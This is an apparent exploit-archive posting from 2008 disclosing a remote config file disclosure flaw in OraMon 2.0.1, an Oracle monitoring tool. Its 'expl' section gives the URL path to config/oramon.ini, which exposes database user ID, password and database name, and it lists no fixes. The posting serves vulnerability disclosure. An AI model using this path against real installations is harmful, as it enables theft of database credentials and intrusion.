OraMon 2.0.1 Remote Config File Disclosure Vulnerability

2008-11-29 22:30:09

........................

..............................................
+++++Bypass Config Download Vulnerability+++++
...............................................

script:Oramon = Oracle Database Monitoring

++++++++++++++++++++++++++++++++++++++++++++++++++++++++
download:http://www.oramon.org/downloads/oramon.tar.gz

++++++++++++++++++++++++++++++++++++++++++++++++++++++++
expl:

$USERID=
$PASSWORD=
$DATABASE=

www.site.com/path/config/oramon.ini


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
| | | | | |
Author: ahmadbady
| | | | | |
my mail: [email protected] | | | | | |
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

#

Fixes

No fixes

In order to submit a new fix you need to be registered.